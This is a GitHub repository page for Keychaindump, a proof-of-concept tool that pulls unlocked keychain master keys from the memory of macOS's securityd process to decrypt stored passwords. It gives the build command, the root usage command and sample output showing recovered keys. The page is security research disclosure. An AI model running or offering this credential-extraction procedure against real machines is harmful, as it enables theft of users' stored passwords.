Skip to content
This repository


Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP

A proof-of-concept tool for reading OS X keychain passwords

branch: master

Add link to blog

latest commit 11c964f0d3
Juuso Salonen authored
Octocat-spinner-32 Add link to blog September 05, 2012
Octocat-spinner-32 keychaindump.c Initial version September 05, 2012


Keychaindump is a proof-of-concept tool for reading OS X keychain passwords as root. It hunts for unlocked keychain master keys located in the memory space of the securityd process, and uses them to decrypt keychain files.

See the blog post for a much more readable description.


Build instructions:

$ gcc keychaindump.c -o keychaindump -lcrypto

Basic usage:

$ sudo ./keychaindump [path to keychain file, leave blank for default]

Example with truncated and censored output:

$ sudo ./keychaindump 
[*] Searching process 15 heap range 0x7fa809400000-0x7fa809500000
[*] Searching process 15 heap range 0x7fa809500000-0x7fa809600000
[*] Searching process 15 heap range 0x7fa809600000-0x7fa809700000
[*] Searching process 15 heap range 0x7fa80a900000-0x7fa80ac00000
[*] Found 17 master key candidates
[*] Trying to decrypt wrapping key in /Users/juusosalonen/Library/Keychains/login.keychain
[*] Trying master key candidate: b49ad51a672bd4be55a4eb4efdb90b242a5f262ba80a95df
[*] Trying master key candidate: 22b8aa80fa0700605f53994940fcfe9acc44eb1f4587f1ac
[*] Trying master key candidate: 1d7aa80fa0700f002005043210074b877579996d09b70000
[*] Trying master key candidate: 88edbaf22819a8eeb8e9b75120c0775de8a4d7da842d4a4a
[+] Found master key: 88edbaf22819a8eeb8e9b75120c0775de8a4d7da842d4a4a
[+] Found wrapping key: e9acc39947f1996df940fceb1f458ac74b877579f54409b7


Keychaindump was written by Juuso Salonen, the guy behind Radio Silence and Private Eye.


Do whatever you wish. Please don't be evil.

Something went wrong with that request. Please try again.